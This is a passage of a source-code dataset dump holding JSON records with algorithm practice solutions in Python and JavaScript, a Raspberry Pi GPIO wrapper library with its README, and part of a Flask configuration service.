self.minMaxStack.append((minNumber, maxNumber))\n\n print(self.stack)\n print(self.minMaxStack)\n\n # O(1) time | O(1) space\n def getMin(self):\n if (len(self.minMaxStack)):\n return self.minMaxStack[-1][0]\n\n return None\n\n # O(1) time | O(1) space\n def getMax(self):\n if (len(self.minMaxStack)):\n return self.minMaxStack[-1][1]\n\n return None\n\nnewMinMaxStack = MinMaxStack()\n\nprint(newMinMaxStack.push(1))\nprint(newMinMaxStack.push(2))\nprint(newMinMaxStack.push(3))\nprint(newMinMaxStack.push(-2))\nprint(newMinMaxStack.push(-40))\nprint(newMinMaxStack.push(0))\nprint(newMinMaxStack.push(32))\nprint(newMinMaxStack.push(21))\nprint(newMinMaxStack.peek())\nprint(newMinMaxStack.getMin())\nprint(newMinMaxStack.getMax())\n" }, { "alpha_fraction": 0.519391655921936, "alphanum_fraction": 0.5224334597587585, "avg_line_length": 26.978723526000977, "blob_id": "7604c80a99035ca7c9a28454d5546cd386ef52f1", "content_id": "12fcc04a9a72f6a9102511b1e902ad3f7d74d1a4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1315, "license_type": "permissive", "max_line_length": 75, "num_lines": 47, "path": "/Stacks/balanced-brackets.js", "repo_name": "henryoliver/algo-expert-solutions", "src_encoding": "UTF-8", "text": "/**\n * The function should return a boolean representing whether the string is \n * balenced with regards to brackets\n *\n * Complexity Analysis\n * O(n) time | O(n) space\n *\n * @param string - string made up of brackets and other optional characters\n * @returns boolean - string is balenced or not\n */\n// const balancedBrackets = (string) => {\n// const stack = [];\n// const matchBrackets = {')': '(', ']': '[', '}': '{'};\n//\n// for (const char of string) {\n// if (Object.values(matchBrackets).includes(char)) {\n// stack.push(char);\n// } else if (Object.keys(matchBrackets).includes(char)) {\n// if (matchBrackets[char] === stack[stack.length - 1]) {\n// stack.pop();\n// } else {\n// return false;\n// }\n// }\n// }\n//\n// return stack.length === 0;\n// };\n\nconst balancedBrackets = (string = '') => {\n const openBrackets = '([{';\n const closeBrackets = ')]}'; \n\n const result = Array.from(string).reduce((acc, curr) => {\n if (openBrackets.includes(curr)) {\n return ++acc;\n } else if (closeBrackets.includes(curr)) {\n return --acc;\n }\n\n return acc;\n }, 0);\n\n return result === 0;\n};\n\nconsole.debug(balancedBrackets('{[[[[({(}))]]]]}'));\n" }, { "alpha_fraction": 0.6066201329231262, "alphanum_fraction": 0.6106732487678528, "avg_line_length": 28.79865837097168, "blob_id": "98cf5288c17706f2b2a402e172266b0065caec3a", "content_id": "9a66eef21283ea61fc9682ce0886bc6392041e28", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 4453, "license_type": "permissive", "max_line_length": 112, "num_lines": 149, "path": "/Strings/palindrome-check.js", "repo_name": "henryoliver/algo-expert-solutions", "src_encoding": "UTF-8", "text": "/**\n * Solution 1 - Reverse array last to first\n *\n * Complexity Analysis\n * O(n) time | O(n) space\n *\n * Check if non-empty string is a palindrome\n *\n * @param {string} non-empty string\n * @returns {boolean} \n */\nfunction isPalindrome(string = '') {\n // Assertions\n console.assert(typeof string === 'string' && string !== '', 'Parameter should be a valid non-empty string');\n\n // Gracefully handle type and Falsy values\n if (typeof string !== 'string' || string === '') {\n console.error('Parameter should be a valid non-empty string');\n return false;\n }\n\n if (string.length === 1) {\n return true;\n }\n\n const reversedChars = [];\n\n for (let i = string.length - 1; i >= 0; i--) {\n reversedChars.push(string[i]);\n }\n\n return string.toLowerCase() === reversedChars.join('').toLowerCase();\n}\n\n/**\n * Solution 2 - Recursion\n *\n * Complexity Analysis\n * O(n) time | O(n) space\n *\n * Check if non-empty string is a palindrome\n *\n * @param {string} non-empty string\n * @returns {boolean} \n */\n// function isPalindrome(string = '', i = 0) {\nfunction isPalindrome(string = '', i = 0) {\n // Gracefully handle type and Falsy values\n if (typeof string !== 'string' || string === '') {\n console.error('Parameter should be a valid non-empty string');\n return false;\n }\n\n const j = string.length - 1 - i;\n\n const firstChar = string[i];\n const lastChar = string[j];\n\n // Base case\n if (i >= j) {\n return true;\n }\n\n if (firstChar.toLowerCase() === lastChar.toLowerCase()) {\n return isPalindrome(string, i + 1);\n } else {\n return false;\n }\n}\n\n/**\n * Solution 3 - Pointers\n *\n * Complexity Analysis\n * O(n) time | O(1) space\n *\n * Check if non-empty string is a palindrome\n *\n * @param {string} non-empty string\n * @returns {boolean} \n */\nfunction isPalindrome(string = '') {\n // Assertions\n console.assert(typeof string === 'string' && string !== '', 'Parameter should be a valid non-empty string');\n\n // Gracefully handle type and Falsy values\n if (typeof string !== 'string' || string === '') {\n console.error('Parameter should be a valid non-empty string');\n return false;\n }\n\n if (string.length === 1) {\n return true;\n }\n\n for (let i = 0; i < string.length; i++) {\n const firstChar = string[i];\n const lastChar = string[string.length - 1 - i];\n\n if (firstChar.toLowerCase() !== lastChar.toLowerCase()) {\n return false;\n }\n }\n\n return true;\n}\n\nconst testCases = [\n // Normal\n // Data that is typical (expected) and should be accepted by the system.\n { assert: isPalindrome('Wow'), expected: true },\n { assert: isPalindrome('Anna'), expected: true },\n { assert: isPalindrome('Kayak'), expected: true },\n { assert: isPalindrome('1abcba1'), expected: true },\n { assert: isPalindrome('AbCdcBa'), expected: true },\n { assert: isPalindrome('Repaper'), expected: true },\n { assert: isPalindrome('abcdefg'), expected: false },\n { assert: isPalindrome('Hello World'), expected: false },\n\n // Boundary data (extreme data, edge case)\n // Data at the upper or lower limits of expectations that should be accepted by the system.\n { assert: isPalindrome('a'), expected: true },\n { assert: isPalindrome('tattarrattat'), expected: true },\n\n // Abnormal data (erroneous data)\n // Data that falls outside of what is acceptable and should be rejected by the system.\n { assert: isPalindrome(), expected: false },\n { assert: isPalindrome(0), expected: false },\n { assert: isPalindrome(''), expected: false },\n { assert: isPalindrome([]), expected: false },\n { assert: isPalindrome({}), expected: false },\n { assert: isPalindrome(NaN), expected: false },\n { assert: isPalindrome(null), expected: false },\n { assert: isPalindrome(false), expected: false },\n { assert: isPalindrome(new Set()), expected: false },\n { assert: isPalindrome(new Map()), expected: false },\n { assert: isPalindrome(undefined), expected: false },\n];\n\n// Run tests\ntestCases.forEach((test, index) => {\n const currentTest = `# Test ${index + 1}`;\n\n console.group(currentTest);\n console.log('Actual: ', test.assert);\n console.log('Expected: ', test.expected);\n console.log(test.assert === test.expected ? '🤘 Test PASSED 🤘' : '👎 Test FAILED 👎', '\\n');\n console.groupEnd(currentTest);\n});\n\n" }, { "alpha_fraction": 0.8113207817077637, "alphanum_fraction": 0.8113207817077637, "avg_line_length": 25.5, "blob_id": "1b2f60a0d72c72895646e53e3c0afcb1ffd97584", "content_id": "c2974b27b1face0151f02c53f7d86868a0a55260", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 53, "license_type": "permissive", "max_line_length": 28, "num_lines": 2, "path": "/README.md", "repo_name": "henryoliver/algo-expert-solutions", "src_encoding": "UTF-8", "text": "# algo-expert-solutions\nMy solutions for Algo Expert\n" }, { "alpha_fraction": 0.545509934425354, "alphanum_fraction": 0.5654205679893494, "avg_line_length": 31.375, "blob_id": "9b72644b55e13daa764399c2c70e07c55ee49818", "content_id": "8aa328b752563ffd254e477b69158f4323bd2482", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4934, "license_type": "permissive", "max_line_length": 126, "num_lines": 152, "path": "/Arrays/four-number-sum.py", "repo_name": "henryoliver/algo-expert-solutions", "src_encoding": "UTF-8", "text": "def fourNumberSum(array=[], targetSum=0):\n '''\n Solution 1\n\n O(n^4) time | O(n) space\n\n The function should find all quadruplets in the array that sum up\n to the target sum and return a two-dimensional array of all these quadruplets.\n\n array: a list of integers\n targetSum: an integer\n return: a two-dimensional list of all found quadruplets\n '''\n # Remove duplicates and sort the list\n array = sorted(list(dict.fromkeys(array)))\n\n foundQuadruplets = [];\n\n for i in range(len(array) - 3):\n firstNumber = array[i]\n\n for j in range(i + 1, len(array) - 2):\n secondNumber = array[j]\n\n for k in range(j + 1, len(array) - 1):\n thirdNumber = array[k]\n\n for l in range(k + 1, len(array)):\n fourthNumber = array[l]\n\n if (firstNumber + secondNumber + thirdNumber + fourthNumber == targetSum):\n foundQuadruplets.append([firstNumber, secondNumber, thirdNumber, fourthNumber])\n\n return foundQuadruplets\n\ndef fourNumberSum(array=[], targetSum=0):\n '''\n Solution 2 - Hash map\n\n O(n^3) time | O(n^2) space\n\n The function should find all quadruplets in the array that sum up\n to the target sum and return a two-dimensional array of all these quadruplets.\n\n array: a list of integers\n targetSum: an integer\n return: a two-dimensional list of all found quadruplets\n '''\n # Remove duplicates and sort the list\n array = sorted(list(dict.fromkeys(array)))\n\n trackedSums = {}\n foundQuadruplets = []\n\n for i in range(1, len(array)):\n\n # Inner loop after\n if (trackedSums):\n j = i + 1\n\n while (j < len(array)):\n currentSum = array[i] + array[j] # P = x + y\n difference = targetSum - currentSum\n\n if (difference in trackedSums):\n trackedSum = trackedSums[difference]\n\n for sumPair in trackedSum:\n foundQuadruplets.append(sorted([*sumPair, array[i], array[j]]))\n\n j += 1\n\n # Inner loop before\n k = 0\n\n while (k < i):\n currentSum = array[i] + array[k] # Q = z + k\n difference = targetSum - currentSum\n\n if (currentSum in trackedSums):\n trackedSums[currentSum].append([array[i], array[k]])\n else:\n trackedSums[currentSum] = [[array[i], array[k]]]\n\n k += 1\n\n foundQuadruplets.sort()\n\n return foundQuadruplets\n\ndef fourNumberSum(array=[], targetSum=0):\n '''\n Solution 3 - Sorting along with the two-pointer sliding window approach\n\n O(n^3) time | O(n^2) space\n\n The function should find all quadruplets in the array that sum up\n to the target sum and return a two-dimensional array of all these quadruplets.\n\n array: a list of integers\n targetSum: an integer\n return: a two-dimensional list of all found quadruplets\n '''\n # Remove duplicates and sort the list\n array = sorted(list(dict.fromkeys(array)))\n\n foundQuadruplets = []\n\n for i in range(len(array) - 3):\n for j in range(i + 1, len(array) - 2):\n leftPointer = j + 1\n rightPointer = len(array) - 1\n\n while (leftPointer < rightPointer):\n currentSum = array[i] + array[j] + array[leftPointer] + array[rightPointer]\n\n if (currentSum == targetSum):\n foundQuadruplets.append(sorted([array[i], array[j], array[leftPointer], array[rightPointer]]))\n leftPointer += 1\n rightPointer -= 1\n elif (currentSum < targetSum):\n leftPointer += 1\n elif (currentSum > targetSum):\n rightPointer -= 1\n\n foundQuadruplets.sort()\n\n return foundQuadruplets\n\n\n# Test cases (black box - unit testing)\ntestCases = [\n { 'assert': fourNumberSum([1, 2, 3, 4, 5, 6, 7], 10), 'expected': [[1, 2, 3, 4]] },\n { 'assert': fourNumberSum([7, 6, 4, -1, 1, 2], 16), 'expected': [[ -1, 4, 6, 7 ], [ 1, 2, 6, 7 ]] },\n { 'assert': fourNumberSum([5, -5, -2, 2, 3, -3], 0), 'expected': [[ -5, -2, 2, 5 ], [ -5, -3, 3, 5 ], [ -3, -2, 2, 3 ]] },\n \n # Boundary conditions (empty lists, singleton list, large numbers, small numbers)\n { 'assert': fourNumberSum(), 'expected': [] },\n { 'assert': fourNumberSum([], 0), 'expected': [] },\n { 'assert': fourNumberSum([1], 10), 'expected': [] },\n { 'assert': fourNumberSum([1, 2, 3, 4]), 'expected': [] },\n { 'assert': fourNumberSum([], 1000000000), 'expected': [] },\n\n # Extremes\n]\n\n# Run tests\nfor (index, test) in enumerate(testCases):\n print(f'# Test {index + 1}')\n print(f'Actual: {test[\"assert\"]}')\n print(f'Expected: {test[\"expected\"]}')\n print('🤘 Test PASSED 🤘' if test[\"assert\"] == test[\"expected\"] else '👎 Test FAILED 👎', '\\n')\n\n" }, { "alpha_fraction": 0.5568826794624329, "alphanum_fraction": 0.6049566864967346, "avg_line_length": 32.470001220703125, "blob_id": "20ddd9596945a8b7fcc4f9d16c37fa21401ca700", "content_id": "aba897cb843b97b739589728891872fd2f0c0ead", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 3361, "license_type": "permissive", "max_line_length": 166, "num_lines": 100, "path": "/Arrays/smallest-difference.js", "repo_name": "henryoliver/algo-expert-solutions", "src_encoding": "UTF-8", "text": "// Smallest Difference\n\n/**\n * Solution 1 - Brute force (aka: Naive)\n *\n * Complexity Analysis\n * O(n^2) time | O(1) space\n *\n * @param {array} arrayOne - non-empty array of integers\n * @param {array} arrayTwo - non-empty array of integers\n * @returns {array} array containing these two numbers\n */\nfunction smallestDifference(arrayOne = [], arrayTwo = []) {\n let closestPair = [];\n let closestNumber = Infinity;\n \n for (let i = 0; i < arrayOne.length; i++) {\n for (let j = 0; j < arrayTwo.length; j++) {\n const absoluteDiff = Math.abs(arrayOne[i] - arrayTwo[j]);\n\n if (absoluteDiff < closestNumber) {\n closestNumber = absoluteDiff;\n closestPair = [arrayOne[i], arrayTwo[j]];\n }\n }\n }\n\n return closestPair;\n}\n\n/**\n * Solution 2 - Sorting along with the two-pointer sliding window approach\n *\n * Complexity Analysis\n * O(n log(n) + m log(m)) time | O(1) space\n *\n * @param {array} arrayOne - non-empty array of integers\n * @param {array} arrayTwo - non-empty array of integers\n * @returns {array} array containing these two numbers\n */\nfunction smallestDifference(arrayOne = [], arrayTwo = []) {\n arrayOne.sort((a, b) => a - b);\n arrayTwo.sort((a, b) => a - b);\n\n let closestPair = [];\n let closestNumber = Infinity;\n\n let arrayOnePointer = 0;\n let arrayTwoPointer = 0;\n\n while (arrayOnePointer < arrayOne.length && arrayTwoPointer < arrayTwo.length) {\n let firstNumber = arrayOne[arrayOnePointer];\n let secondNumber = arrayTwo[arrayTwoPointer];\n let currentAbsDiff = Math.abs(firstNumber - secondNumber);\n\n if (currentAbsDiff < closestNumber) {\n closestNumber = currentAbsDiff;\n closestPair = [firstNumber, secondNumber];\n }\n\n if (firstNumber < secondNumber) {\n arrayOnePointer++;\n } else if (secondNumber < firstNumber) {\n arrayTwoPointer++;\n } else {\n closestPair = [firstNumber, secondNumber];\n break;\n }\n }\n\n return closestPair;\n}\n\n\n// Test cases (black box - unit testing)\nconst testCases = [\n { assert: smallestDifference([-1, 5, 10, 20, 28, 3], [26, 134, 135, 15, 17]), expected: [28, 26] },\n { assert: smallestDifference([-1, 5, 10, 20, 3], [26, 134, 135, 15, 17]), expected: [20, 17] },\n { assert: smallestDifference([10, 0, 20, 25], [1005, 1006, 1014, 1032, 1031]), expected: [25, 1005] },\n \n // Boundary conditions (empty lists, singleton list, large numbers, small numbers)\n { assert: smallestDifference(), expected: [] },\n { assert: smallestDifference([], []), expected: [] },\n { assert: smallestDifference([0]), expected: [] },\n { assert: smallestDifference([], [0]), expected: [] },\n\n // Extremes\n { assert: smallestDifference([10, 1000, 9124, 2142, 59, 24, 596, 591, 124, -123, 530], [-1441, -124, -25, 1014, 1500, 660, 410, 245, 530]), expected: [530, 530] }\n];\n\n// Run tests\ntestCases.forEach((test, index) => {\n const currentTest = `# Test ${index + 1}`;\n\n console.group(currentTest);\n console.log('Actual: ', test.assert);\n console.log('Expected: ', test.expected);\n console.log(JSON.stringify(test.assert) === JSON.stringify(test.expected) ? '🤘 Test PASSED 🤘' : '👎 Test FAILED 👎', '\\n');\n console.groupEnd(currentTest);\n});\n\n\n" }, { "alpha_fraction": 0.5621734857559204, "alphanum_fraction": 0.58411705493927, "avg_line_length": 28.275510787963867, "blob_id": "fc1d84df921f718953bae6c14052e3e56765987a", "content_id": "7e08feed0f89df39e33b132701f8d974f5c5cb4b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2883, "license_type": "permissive", "max_line_length": 125, "num_lines": 98, "path": "/Arrays/move-element-to-end.js", "repo_name": "henryoliver/algo-expert-solutions", "src_encoding": "UTF-8", "text": "// Smallest Difference\n\n/**\n * Solution 1 - Queue tracking system\n *\n * Complexity Analysis\n * O(n) time | O(n) space\n *\n * @param {array} array of integers\n * @param {toMove} integer\n * @returns {array} array in place\n */\nfunction moveElementToEnd(array = [], toMove = 0) {\n // Queue\n const queue = ({ queue = [] } = {}) => ({\n enqueue: (item) => queue.push(item),\n dequeue: () => queue.shift(),\n isEmpty: () => queue.length === 0\n });\n\n const toMoveIndexesQueue = queue();\n\n for (let currentIndex in array) {\n const currentNumber = array[currentIndex];\n\n if (currentNumber === toMove) {\n toMoveIndexesQueue.enqueue(Number(currentIndex));\n } else if (toMoveIndexesQueue.isEmpty() === false) {\n const firstToMoveIndex = toMoveIndexesQueue.dequeue();\n\n array[currentIndex] = array[firstToMoveIndex];\n array[firstToMoveIndex] = currentNumber;\n\n toMoveIndexesQueue.enqueue(Number(currentIndex));\n }\n }\n \n return array;\n}\n\n/**\n * Solution 2 - Pointers narrowing approach\n *\n * Complexity Analysis\n * O(n) time | O(1) space\n *\n * @param {array} array of integers\n * @param {toMove} integer\n * @returns {array} array in place\n */\nfunction moveElementToEnd(array = [], toMove = 0) {\n let leftPointer = 0;\n let rightPointer = array.length - 1;\n\n do {\n const leftNumber = array[leftPointer];\n const rightNumber = array[rightPointer];\n\n if (leftNumber === toMove && rightNumber !== toMove) {\n array[leftPointer] = rightNumber;\n array[rightPointer] = leftNumber;\n\n leftPointer += 1;\n rightPointer -= 1;\n } else if (rightNumber === toMove) {\n rightPointer -= 1;\n } else if (leftNumber !== toMove) {\n leftPointer += 1;\n }\n } while (leftPointer < rightPointer);\n\n return array;\n}\n\n\n// Test cases (black box - unit testing)\nconst testCases = [\n { assert: moveElementToEnd([2, 1, 2, 2, 2, 3, 4, 2], 2), expected: [1, 3, 4, 2, 2, 2, 2, 2] },\n { assert: moveElementToEnd([1, 2, 4, 5, 6], 3), expected: [1, 2, 4, 5, 6] },\n { assert: moveElementToEnd([3, 3, 3, 3, 3], 3), expected: [3, 3, 3, 3, 3] },\n { assert: moveElementToEnd([1, 2, 4, 5, 3], 3), expected: [1, 2, 4, 5, 3] },\n \n // Boundary conditions (empty lists, singleton list, large numbers, small numbers)\n { assert: moveElementToEnd(), expected: [] },\n\n // Extremes\n];\n\n// Run tests\ntestCases.forEach((test, index) => {\n const currentTest = `# Test ${index + 1}`;\n\n console.group(currentTest);\n console.log('Actual: ', test.assert);\n console.log('Expected: ', test.expected);\n console.log(JSON.stringify(test.assert) === JSON.stringify(test.expected) ? '🤘 Test PASSED 🤘' : '👎 Test FAILED 👎', '\\n');\n console.groupEnd(currentTest);\n});\n\n\n" }, { "alpha_fraction": 0.5667613744735718, "alphanum_fraction": 0.5696022510528564, "avg_line_length": 28.33333396911621, "blob_id": "4f347349733cd1da5a6296b61ba71e6d579938d1", "content_id": "09738c5662ef296adbb343b3c0cf0c07217120f4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 704, "license_type": "permissive", "max_line_length": 75, "num_lines": 24, "path": "/Stacks/balanced-brackets.py", "repo_name": "henryoliver/algo-expert-solutions", "src_encoding": "UTF-8", "text": "def balancedBrackets(string=''):\n '''\n The function should return a boolean representing whether the string is\n balenced with regards to brackets\n\n Complexity Analysis\n O(n) time | O(n) space\n\n string: string made up of brackets and other optional characters\n return: boolean - string is balenced or not\n '''\n stack = []\n matchBrackets = {')': '(', ']': '[', '}': '{'}\n\n for char in string:\n if (char in matchBrackets.values()):\n stack.append(char)\n elif (char in matchBrackets):\n if (matchBrackets[char] == (stack or [None])[-1]):\n stack.pop()\n else:\n return False\n\n return len(stack) == 0\n" } ]
13
jbb1999/Doggydiscordbot
https://github.com/jbb1999/Doggydiscordbot
f6e4ad0d0d0424e3984e29190a475f4abda0d8b8
5c6a2f94c9fa2902db45b635262825c6e6f26a87
9e39c8d1fda848ce6ec4d76f36e0df4a01ab033b
refs/heads/main
2023-05-28T17:36:11.032171
2021-06-17T16:51:37
2021-06-17T16:51:37
377,832,360
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7253521084785461, "alphanum_fraction": 0.7816901206970215, "avg_line_length": 141, "blob_id": "5ccafb07a73101794e6f684edbdb29485f12ffd5", "content_id": "49576f712d8bf6a7b30d2d9adb7ce0fa6cf243a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 142, "license_type": "no_license", "max_line_length": 141, "num_lines": 1, "path": "/README.md", "repo_name": "jbb1999/Doggydiscordbot", "src_encoding": "UTF-8", "text": "This bot was made by Jbb1999#0001. If you find any issues please dm me on discord! Its pretty straight forward, but dm me with any questions!\n" }, { "alpha_fraction": 0.6557759642601013, "alphanum_fraction": 0.6557759642601013, "avg_line_length": 22.542856216430664, "blob_id": "35a57ce0115bb1d8bdec9e2481cee993f8e736d9", "content_id": "d8c68133a90c1baf3f4c93280d2f5b1594ab9fb8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 857, "license_type": "no_license", "max_line_length": 86, "num_lines": 35, "path": "/main.py", "repo_name": "jbb1999/Doggydiscordbot", "src_encoding": "UTF-8", "text": "import discord\r\nimport config\r\nfrom discord.ext import commands\r\n\r\n\r\n\r\nbot = commands.Bot(config.command_prefix)\r\n\r\n\r\n\r\n\r\[email protected]\r\nasync def on_ready():\r\n if str(config.playing_true) == 'true':\r\n await bot.change_presence(activity=discord.Game(name=config.playing_name))\r\n\r\n\r\n#user pinged\r\[email protected]\r\nasync def on_message(message):\r\n mention = f'<@!{c}>'\r\n if mention in message.content:\r\n await message.channel.send(\"You are now allowed to mention this user\")\r\n await channel.send(f'{str(ctx.author)} has just pinged person.')\r\n\r\n\r\n#invites\r\nasync def on_message(message):\r\n if message.author != c.user:\r\n if message.contains(\"discord.gg\")\r\n await message.delete()\r\n await message.channel.send('Invites are not allowed')\r\n await bot.process_commands(message)\r\n\r\nbot.run(config.token)" }, { "alpha_fraction": 0.7479338645935059, "alphanum_fraction": 0.7479338645935059, "avg_line_length": 79, "blob_id": "dda807f13f9a18076d5852a369f0615366b74627", "content_id": "af0e6706104432ca775c76d6744eb5d93709f4ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 484, "license_type": "no_license", "max_line_length": 159, "num_lines": 6, "path": "/config.py", "repo_name": "jbb1999/Doggydiscordbot", "src_encoding": "UTF-8", "text": "token = \"please enter your oken here\"\r\n\r\ncommand_prefix = input(\"Please enter your desired prefix: \")\r\nplaying_true = input(\"Would you like to have a playing game status? It is case sensetive and will give an error if its not written correctly Say true/false: \")\r\nplaying_name = input(\"What would you like the name of the playing status? Leave this blank if not having one: \")\r\nblacklisted_id = \"\" #this is where you enter the user id of the person you wish to alert when gets pinged." } ]
3
sloft/gpiocrust
https://github.com/sloft/gpiocrust
1c7d07502d4cd8488820257163057736a426c47a
0296f90e511cee6f29e429f00c7f13a58a22af13
09572ea2fb10479f117e3cfecf548018dc69791e
refs/heads/master
2020-02-28T10:04:54.783713
2013-08-15T14:25:11
2013-08-15T14:25:11
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6422699689865112, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 30.433332443237305, "blob_id": "00b7301f5f037d12dea3d4b89e38c35d482dcc55", "content_id": "5c101b4f679394a67d6d31822c6e67f24eb0fd46", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3771, "license_type": "permissive", "max_line_length": 321, "num_lines": 120, "path": "/README.md", "repo_name": "sloft/gpiocrust", "src_encoding": "UTF-8", "text": "gpiocrust\n=========\n\nA simple object-oriented wrapper around the Raspberry Pi's [RPi.GPIO](https://pypi.python.org/pypi/RPi.GPIO) library. An encrusting, if you will.\n\n**This is a work in progress.** The goal is a consise, [pythonic](http://stackoverflow.com/a/58992/311207) API for the Raspberry Pi's general purpose I/O pins. I welcome all suggestions, contributions, and half-hearted insults.\n\nUsage\n-----\n\n**Header**\n\nThe `Header` class just wraps the GPIO setup and teardown methods. Most importantly, it ensures that `GPIO.cleanup()` is called. For example:\n\n from gpiocrust import Header\n\n with Header() as header\n # Application logic goes here\n pass\n\n # All cleaned up now.\n \n**OutputPin**\n\nThe `OutputPin` class controls a single GPIO pin for output. You can set its value to `True` (`1`) or `False` (`0`). That's all there is to it!\n\n from gpiocrust import Header, OutputPin\n \n with Header() as header:\n shiny_led = OutputPin(11)\n shiny_led.value = True\n ...\n\n`value` defaults to `False`, but you can set it on instantiation like so:\n\n shiny_led = OutputPin(11, value=True)\n\n**PWMOutputPin**\n\nThe `PWMOutputPin` class controls a single GPIO pin for output, but allows for variable `value`s via software pulse width modulation.\n\n from gpiocrust import Header, PWMOutputPin\n \n with Header() as header:\n soft_led = PWMOutputPin(11)\n soft_led.value = 0.25\n ...\n\nYou can set the frequency (Hz) via the `frequency` property. For example:\n\n from gpiocrust import Header, PWMOutputPin\n \n with Header() as header:\n soft_led = PWMOutputPin(11, frequency=100)\n solf_led.frequency = 50\n\n**NOTE:** the RPi.GPIO implementation uses duty cycle values from `0` to `100`. To be consistent with `OutputPin`, `PWMOutputPin` uses decimal values `0.0` to `1.0`.\n\nFor a good overview of how to use the [RPi.GPIO](https://pypi.python.org/pypi/RPi.GPIO) implementation, see [this video](http://youtu.be/uUn0KWwwkq8).\n\n**InputPin**\n\nThe `InputPin` class controls a single GPIO pin for input. You can watch for edge events using a `callback` argument or via the `@change` decorator. For now, `InputPin` only supports watching `GPIO.BOTH` (rising and falling) events.\n\n from gpiocrust import Header, InputPin\n\n def alert_president(value):\n pass\n\n with Header() as header:\n the_red_button = InputPin(11, callback=alert_president)\n\nUsing the `@change` decorator is recommended.\n\n from gpiocrust import Header, InputPin\n\n with Header() as header:\n the_red_button = InputPin(11, value=0)\n\n @the_red_button.change\n def take_action(value):\n pass\n\nMock API\n--------\nMock classes are included that mimick the native GPIO functionality. The library falls back to mock objects when the `RPi.GPIO` package cannot be loaded. This allows one to code the general I/O flow of an application in development environments where running code on a physical Raspberry Pi is inconvenient or impossible.\n\nFallback is automatic, so your import statements will look just as before.\n\nOutputPin example\n-----------------\n\n import time\n from gpiocrust import Header, OutputPin, PWMOutputPin\n\n with Header() as header:\n pin11 = OutputPin(11)\n pin15 = PWMOutputPin(15, frequency=100, value=0)\n \n try:\n while 1:\n # Going up\n pin11.value = True\n \n for i in range(100):\n pin15.value = i / 100.0\n time.sleep(0.01)\n \n time.sleep(0.5)\n \n # Going down\n pin11.value = False\n \n for i in range(100):\n pin15.value = (100 - i) / 100.0\n time.sleep(0.01)\n \n time.sleep(0.5)\n except KeyboardInterrupt:\n pass" }, { "alpha_fraction": 0.4563106894493103, "alphanum_fraction": 0.4660194218158722, "avg_line_length": 28.5, "blob_id": "3dc6338821a636362f6e17ae1f61b81e0a0b72f1", "content_id": "800d7318113f26b34c2be70eab4eddfd82cd74d9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 412, "license_type": "permissive", "max_line_length": 78, "num_lines": 14, "path": "/__init__.py", "repo_name": "sloft/gpiocrust", "src_encoding": "UTF-8", "text": "\"\"\"\nObject oriented wrapper around RPi.GPIO. A work in progress.\n\n(zourtney, August 2013)\n\"\"\"\n\ntry:\n import RPi.GPIO\n from raspberry_pi import *\nexcept:\n print '--------------------------------------------------------------------'\n print ' WARNING: RPi.GPIO library not found. Falling back to mock objects. '\n print '--------------------------------------------------------------------'\n from mock import *" } ]
2
energyjry/n_route
https://github.com/energyjry/n_route
9981e12f82d2983274eeda7797dd55d9c2c93d06
56b7dbdfc5d88366fa5257330dee36c5d7ac44c4
0df50e55d4b77080f1424400920c7871cd48d128
refs/heads/master
2020-08-23T19:26:35.156548
2019-10-22T01:30:02
2019-10-22T01:30:02
216,692,056
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.5523960590362549, "alphanum_fraction": 0.5557159185409546, "avg_line_length": 38.58856964111328, "blob_id": "82e91a6d1396533f51bb51a2b403448cf27f952c", "content_id": "25b8318d00fd2047baa3b837e43b60d36a73fcd6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7246, "license_type": "no_license", "max_line_length": 119, "num_lines": 175, "path": "/n_route/app/n_route.py", "repo_name": "energyjry/n_route", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: jiaruya\n@file: n_route.py\n@time: 2019/09/08\n@desc:\n\"\"\"\nimport json\nfrom flask import Flask\nfrom flask_restplus import Api\nfrom core import Core\nfrom share import CFG_PATH, LOG, Data\nfrom share import sensor2dict\nfrom interface import IVersion, IConfig, IReadTopic, IReadTag, IWriteTag, IFlushData, IState\nfrom interface import REST_VERSION, REST_CONFIG, REST_READ_TOPIC, REST_READ_TAG, REST_FLUSH_DATA, REST_STATE\n\n\nclass Version(IVersion):\n def get_version(self):\n try:\n return True, {'serv_name': basic_info.server_name, 'serv_version': basic_info.server_version,\n 'serv_desc': basic_info.server_desc}\n except Exception as err:\n return False, str(err)\n\n\nclass Config(IConfig):\n def set_config(self, cfg_name, cfg_msg):\n file_name = CFG_PATH + cfg_name + '.json'\n if type(cfg_msg) == dict or type(cfg_msg) == list:\n cfg_msg = json.dumps(cfg_msg, ensure_ascii=False, indent=2)\n try:\n with open(file_name, 'w', encoding='utf-8') as f:\n f.write(cfg_msg)\n ret = '保存配置:%s:%s' % (file_name, cfg_msg)\n LOG.info(ret)\n m_core.set_run_config(file_name, cfg_msg)\n return True, cfg_msg\n except Exception as err:\n ret = '保存配置失败:%s' % (str(err),)\n LOG.error(ret)\n return False, str(err)\n\n def get_config(self, cfg_name):\n file_name = CFG_PATH + cfg_name + '.json'\n try:\n with open(file_name, 'r', encoding='UTF-8') as f:\n cfg_msg = json.loads(f.read())\n return True, cfg_msg\n except Exception as err:\n ret = '读取配置失败:%s' % (str(err),)\n 